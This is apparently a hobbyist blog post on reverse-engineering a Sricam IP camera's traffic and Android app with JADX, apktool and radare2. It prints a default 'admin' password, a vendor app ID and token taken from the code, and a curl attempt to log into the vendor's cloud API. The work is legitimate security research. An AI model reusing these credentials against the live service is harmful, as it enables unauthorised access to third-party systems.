0103caa80a00011eee2e0b80422226691c0471f66ea96da44381f8030001000051000000
0203caa800000000ee2e0b806285763d44675edb36ca4289587df80300010000010000000000000000000000
0103caa80a00011eee2e0b802792d54f60749ffd12d983af2d85f8030001000051000000
0203caa800000000ee2e0b80422226691c0471f66ea96da44381f80300010000010000000000000000000000
0203caa800000000ee2e0b802792d54f60749ffd12d983af2d85f80300010000010000000000000000000000

This partly cleartext packages was exchanged between IPCam and phone when trying to subscribe an email for an alarm notification: Email Subscribing for Alarm

0.......p...........8...
....iZo8...Ej.q.iZo(H..........0........N............[o....IC.q..[oPPvop.Po[... ...........433.../..............GVo8.[o............
.....C...U.8.[o..C..........W.sa....6..........`...|E.k........hildagard@temp-mail.de..............................................smtp.gmail.com,173.194.193.108,173.194.67.108...................anabelle@shitmail.de............................................2v..i....i0e....`iZo....`...=8O.^....F..0.......p...........8...Attention: alarm...............................................qDear User,
 Please check the attached picture for more information.................................sa...|E.k........

It needs more research and examination to get the “bigger picture” of this server infrastructure. But most important for this part, getting information about encryption and key management.

4. Reversing

There are multiple binaries contributed to the whole application that are worth to be examined. We have to look at the android application and the extracted firmware. Moreover there are single binaries in the firmware beeing suspected to store interesting information that have to be examined. I will go through this process by using different tools to get deeper into the application logic.

4.1 JADX

JADX is a decompiler for java executables that will also process apk. You can simply execute the binary of jadx by appending your desired apk.

On executing JADX I recognized this:

Exception in thread java.lang.OutOfMemoryError: Java heap space

As I work in a VM with low RAM JADX overflows my virtual machine heap. By changing the environment variable we can maximize the memory space and using only one thread it will work better.

$ JAVA_OPTS="-Xmx1300M" ../tools/jadx/bin/jadx -j 1 Sricam_17.7.17_apk-dl.com.apk 

But there are a lot of errors on execution of JADX. Although I started in examining the decompiled files. At first glance I will search for JNI (Java Native Interfaces) that could reveal linkings to the library files:

# ~/doku/Sricam_17.7.17_apk-dl.com
$ grep -rli jni .
./com/mediatek/elian/ElianNative.java
./com/baidu/android/pushservice/g.java
./com/baidu/android/pushservice/message/g.java
./com/baidu/android/pushservice/c/e.java
./com/baidu/android/pushservice/c/j.java
./com/baidu/android/pushservice/c/b.java
./com/baidu/android/pushservice/util/c.java
./com/baidu/android/pushservice/util/s.java
./com/baidu/android/pushservice/j/d.java
./com/baidu/android/pushservice/jni/PushSocket.java
./com/baidu/android/pushservice/jni/BaiduAppSSOJni.java
./com/baidu/android/pushservice/g/d.java
./com/baidu/android/pushservice/f.java
./com/baidu/android/pushservice/config/b.java
./com/xapcamera/SetWifiActivity3.java
./com/tencent/connect/auth/AuthDialog.java
./com/tencent/stat/StatNativeCrashReport.java
./com/tencent/open/web/security/SecureJsInterface.java
./com/tencent/open/web/security/JniInterface.java
./ilnk/lib/IlnkApi.java

We can see on first position ElianNative.java the load of libraries for the wifi chip.

    public static boolean LoadLib() {
        try {
            System.loadLibrary("elianjni");

We will look into the paired library file in the unzipping part of the APK. Searching for other interesting strings:

# ~/doku/Sricam_17.7.17_apk-dl.com
$ grep -rli aes .
./cn/jiguang/api/BasePreferenceManager.java
./cn/jiguang/api/JCoreInterface.java
./com/sina/weibo/sdk/cmd/WbAppActivator.java
./com/sina/weibo/sdk/utils/AesEncrypt.java
./com/baidu/android/pushservice/message/g.java
./com/baidu/android/pushservice/config/b.java
...
./com/baidu/android/pushservice/c/b.java

# ~/doku/Sricam_17.7.17_apk-dl.com/cn/jiguang
$ grep -rli encrypt .
./res/layout/activity_modify_npc_bound_email.xml
./res/layout-v11/activity_modify_npc_bound_email.xml
./cn/jiguang/api/BasePreferenceManager.java
./cn/jiguang/c/a/a.java
./cn/jiguang/a/a/b/h.java
./com/google/zxing/client/result/WifiParsedResult.java
./com/xapcamera/entity/Email.java
./com/xapcamera/p2p/SettingListener.java
./com/xapcamera/device/settings/AlarmSetActivity.java
./com/xapcamera/device/settings/ModifyBoundEmailActivity.java
./com/xapcamera/R.java
./com/p2p/core/MediaPlayer.java
./com/p2p/core/P2PHandler.java
./com/p2p/core/utils/DES.java
...
./com/tencent/open/utils/SystemUtils.java

BasePreferenceManager.java seems to be interesting. Looking into the sourcecode reveals nothing good:

public abstract class BasePreferenceManager {
    private static final String AES_ENCRYPTION_SEED;
    private static final String JPUSH_PREF;
    private static SharedPreferences mSharedPreferences;
    private static final String[] z;
    /* JADX: method processing error */
    /*
        Error: java.lang.StackOverflowError
	...

Checking this with multiple other decompilers lead to the same result. (See in Bytecode Viewer) This file as many others have shortly after beginning some decompiler errors. Some sort of decompiling protection, I guess. I don’t know enough about Android Reversing, so I can’t interprete this the right way at the moment and research doesn’t bring fruity results about this.

Another interesting file points to a default user on a p2p server:

$ vim lnkConstant.java

    public static final String P2P_PARAM_DEFAULT_DEVICE_ID = "XXX-000000-XXXXX";
    public static final String P2P_PARAM_DEFAULT_DEVICE_NAME = "Node161205";
    public static final String P2P_PARAM_DEFAULT_PWD = "admin";
    public static final String P2P_PARAM_DEFAULT_SERVER = "EKPNHXIDAUAOEHLOTBSQEJSWPAARTAPKLXPGENLKLUPLHUATSVEESTPFHWIHPDIEHYAOLVEISQLNEGLPPALQHXERELIALKEHEOHZHUEKIFEEEPEJ-$$";

I suspected a encrypted domain name in the default_server but I wasn’t able to decrypt it.

It’s possible to checkout the upgrade mechanism for the apk on the upg1 server. But redo all requests from a desktop browser by simply appending the clear strings like “/latestversion.asp” results in 404.

$ vim ./com/p2p/core/update/UpdateManager.java
...
private static final String UPDATE_URL = "http://upg1.videoipcamera.cn/";
...

public boolean checkUpdate() {
...
StringBuilder(UPDATE_URL).append(version_parse[0]).append(HttpUtils.PATHS_SEPARATOR).append(version_parse[1]).append("/latestversion.asp").toString();
...

public String getUpdateDescription() {
		...
            HttpURLConnection connection = (HttpURLConnection) new URL(new StringBuilder(UPDATE_URL).append(version_parse[0]).append(HttpUtils.PATHS_SEPARATOR).append(version_parse[1]).append("/des_html.asp").toString()).openConnection();
         
       		....

public void downloadApk(Handler handler, String filePath, String fileName) {
     		...
                HttpURLConnection connection = (HttpURLConnection) new URL("http://upg1.videoipcamera.cn//" + version_parse[0] + HttpUtils.PATHS_SEPARATOR + version_parse[1] + HttpUtils.PATHS_SEPARATOR + this.version_server.trim() + ".apk").openConnection();
 ...

Another interesting file bit is in WXLoginRequest. It reveals another post request “Users/ThirdLogin.ashx” with ID and Token to http://api1.cloudlinks.cn/Users/ThirdLogin.ashx. Overall it reveals the origin of the smartphone app: https://www.yooseecamera.com/

$ vim ./com/xapcamera/network/WXLoginRequest.java

params.add(new BasicNameValuePair("AppID", "d591b466644a0420e5f29aefb0cf0088"));
        params.add(new BasicNameValuePair("AppToken", "2db6962ff0901b8ce771f20f14a651a2786086e55615f951aa0c7c9b33fc5340"));
        params.add(new BasicNameValuePair("Language", App.application.getResources().getConfiguration().locale.getLanguage()));
        params.add(new BasicNameValuePair("AppOS", Constants.VIA_TO_TYPE_QQ_DISCUSS_GROUP));
        params.add(new BasicNameValuePair("AppName", "com.yoosee"));
        String[] parseVerson = new String[]{"00", "46", "00", Constants.VIA_REPORT_TYPE_WPA_STATE};
        int c = Integer.parseInt(parseVerson[2]) << 8;
        params.add(new BasicNameValuePair("AppVersion", String.valueOf((((Integer.parseInt(parseVerson[0]) << 24) | (Integer.parseInt(parseVerson[1]) << 16)) | c) | Integer.parseInt(parseVerson[3]))));
        params.add(new BasicNameValuePair("PackageName", "com.yoosee"));
        params.add(new BasicNameValuePair("ApiVersion", Constants.VIA_TO_TYPE_QQ_GROUP));
        return doPost(params, "Users/ThirdLogin.ashx");

cloudlinks.cn redirects to gwelltimes.cc which seems to provide a SDK for creating P2P enabled devices like our IPCam. This Post Request looks like the login for the cloud API to initialize a P2P session. I tried to do the same with curl with the help of https://github.com/dxsdyhm/GwellDemo and http://doc.cloud-links.net/SDK/iOS/GWP2P/GWP2PDeveloperGuide.html#10101 but I got everytime the same result:

$ curl http://api1.cloudlinks.cn/Users/ThirdLogin.ashx  -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2.1; en-us; Nexus One Build/FRG83)" -d AppID=d591b466644a0420e5f29aefb0cf0088 -d AppToken=2db6962ff0901b8ce771f20f14a651a2786086e55615f951aa0c7c9b33fc5340 -d AppOS=Android -d AppName=com.yoosee -d Language=eng -d PackageName=com.yoosee -d AppVersion=00.23.00.03 -d ApiVersion=0.1 

{"error_code":"14","error":"参数错误"}

4.2 APKTOOL

oit@ubuntu> ~/tools/apktool
$ ./apktool -d Sricam_17.7.17_apk-dl.com.apk 

APKTool will generate smali files from the APK. Smali is a readable format of the dalvik executable dex file. As JADX isn’t capable of disassembling all files it could be worthwile to look at the smali files. It looks like kind of assembler code. Looking into the smali file of BasePreferenceManager.smali we recognize some constant strings:

.method static constructor <clinit>()V
    .locals 14
    const/16 v9, 0x35
    const/16 v10, 0x11
    const/4 v8, 0x4
    const/4 v12, 0x1
    const/4 v1, 0x0
    const-string v2, "W#F\u0013titY\u0008p`\u0016\\\u0005ce(L]+n9Z\u0015t5k\u0004"

But they have no typical length for a IV or a AES key. The strings.xml file could be very useful, as it includes nearly all constant strings, that are used in the Java apk. But doesn’t reveal anything new.

4.3 Unzip the APK

Simply unzipping the apk will unpack it’s resources for Linking and Compiling and reveals DEX binary and the native ARM libraries. We can use the compiled dalvic executable dex file to convert it to a smali. We can use the dex file to repack it to a jar file. The Bytecode Viewer will do exactly this. For now I will simply examining the shared objects files for interesting functions by using information from previous findings. I will use radare2 to examining the binaries:

$ r2 libelianjni.so 
[0x00004b90]> afl
...
0x000059a8   12 290          sym.RT_AES_KeyExpansion
0x00005ad8   43 604          sym.RT_AES_Encrypt
0x00005d4c   42 540          sym.RT_AES_Decrypt
0x00005f80   12 230          sym.RT_HMAC_SHA1
0x0000606c    1 42           sym.RT_SHA1_Init
0x0000609c   15 412          sym.RT_SHA1_Hash
0x00006248    6 96           sym.RT_SHA1_Append
0x000062a8    5 174          sym.RT_SHA1_End
0x00006358    3 72           sym.RT_SHA1
...

Going deeper into this lib file:

[0x0000597c]> s sym.elianStart
sym.createV1Packet
sym.createV2Packet
sym.RT_AES_Encrypt

Examining these functions are strongly related to using or generating AES related keys or Initialization Vectors but I wasn’t able of extracting them.

4.4 Bytecode Viewer

Bytecode Viewer runs into the same errors as JADX and won’t give new information:

Bytecode Viewer

Bytecode Viewer combines multiple different Java decompilers. In the screenshot we can see the output of “JD-Gui”. This is the “Java Decompiler”. This will only work on native .jar files.After unzipping the apk we can find next to the library files a .dex file. We can convert with “dex2jar” the .dex file to a native Java application. Bytecode Viewer uses this mechanism but is running into the same errors.

Overall Security Issues (for now)

overall HTTP connections
probably vulnerable gSoap service

Conclusion

It was a lot of fun to examine this piece of hardware for vulnerabilties and it’s secrets. I guess, I found a lot interesting stuff but I leave with many possible courses of action that could lead into a serious exploit. This is due to lack of knowledge because it’s my first project to start into embedded security. I will doing research into Android Applications and ARM-Architecture to continue the examination in Part 2. If someone reads this blog and could give hints about going further I would be very grateful.

H4ck and that

Pandas Cookbook Part 2 (Assessing/Wrangling)

Assessing

Summarize boolean occurences

Get Column Keys

Filtering

Wrangling

Cleaning

Duplicates and NaN values

Remove Columns/Values

Drop

Create Columns

Categorical Column

Rename Columns

Different Methods to add suffix to column names

Change Values

Lamdba/Apply Functions

Use dict to change values programmatically

Normalize, Extrapolate, Interpolate

Insert Values

Appending, Concat

loc

Cut and Seperate

iloc

Merge, Group And Sum Values

Summarize categorical values

Merging

Melting

Groupby

Regex Use-Cases

Extract

Find and Replace

OSCP Cheat Sheet

Reverse Shells

Elevate shell

Web

Directory Traversal

XSS

File Inclusion

Reverse shell payloads

SQLi

Service Cracking & Enumeration

Password Cracking

Password Bruteforce

Msfvenom Payloads

Local Privilege Escalation

Windows

Registry

sc

wmic

Linux

Access

File Transfer

Linux

Windows

Tools

Tcpdump-Filter

iptables

Hacking An IPCamera Part2

SANS Holiday Hacking Challenge

Overview

1 Terminal Challenges

Isit42 (Overwrite C-Functions with Preload) Wunorse Openslae

Kill santaslittlehelperd Sparkle Redberry

Execute elftalkd Bushy Evergreen

Starting ARM Train binary Pepper Minstix

Execute File without Permissions Holly Evergreen

Extract Information Minty Candycane

Edit Shadow without Rights Shinny Upatree

Inspecting christmassongs.db Sugarplum Mary

2 Apache Struts Server

3 Network Reconnaisance & SMB Server

Windows SMB Server

Mail Server with custom Cookie based encryption

Online Resource Management with XML External Entity (XXE) Vulnerability

Database with XSS Vulnerability, JavaScript Web Token (JWT) Vulnerability and LDAP Injection Vulnerability

XSS

JWT

Hacking An IPCamera Part1

Sricam SP009 Hardware and Software Examination